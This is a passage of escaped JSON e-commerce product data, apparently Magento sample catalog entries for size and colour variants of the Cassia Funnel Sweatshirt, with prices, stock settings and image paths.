Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-XS-Purple\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1086\":{\"sku\":\"WH08-XS-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-XS-White\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-xs-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh08-white_alt1.jpg,\\/w\\/h\\/wh08-white_alternate.jpg,\\/w\\/h\\/wh08-white_back.jpg\",\"image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh08-white_alt1.jpg,\\/w\\/h\\/wh08-white_alternate.jpg,\\/w\\/h\\/wh08-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"White\"},\"1087\":{\"sku\":\"WH08-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-S-Orange\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1088\":{\"sku\":\"WH08-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-S-Purple\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1089\":{\"sku\":\"WH08-S-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-S-White\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-s-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh08-white_alt1.jpg,\\/w\\/h\\/wh08-white_alternate.jpg,\\/w\\/h\\/wh08-white_back.jpg\",\"image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh08-white_alt1.jpg,\\/w\\/h\\/wh08-white_alternate.jpg,\\/w\\/h\\/wh08-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"White\"},\"1090\":{\"sku\":\"WH08-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-M-Orange\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1091\":{\"sku\":\"WH08-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-M-Purple\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1092\":{\"sku\":\"WH08-M-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-M-White\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-m-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh08-white_alt1.jpg,\\/w\\/h\\/wh08-white_alternate.jpg,\\/w\\/h\\/wh08-white_back.jpg\",\"image\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh08-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh08-white_alt1.jpg,\\/w\\/h\\/wh08-white_alternate.jpg,\\/w\\/h\\/wh08-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},\"1093\":{\"sku\":\"WH08-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Cassia Funnel Sweatshirt-L-Orange\",\"description\":\"<p>The casual Cassia Funnel Sweatshirt sports front angled pockets and a drawstring stretch funnel hoodie. A cowl front neck pairs with a tagless label at back neck.<\\/p>\\n<p>&bull; White full zip hoodie with gray detail.<br \\/>&bull; 65% Cotton\\/28% Nylon\\/7% Spandex.<br \\/>&bull; Front slash pockets.<br \\/>&bull; Tagless label at back neck.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"48\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"cassia-funnel-sweatshirt-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh08-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"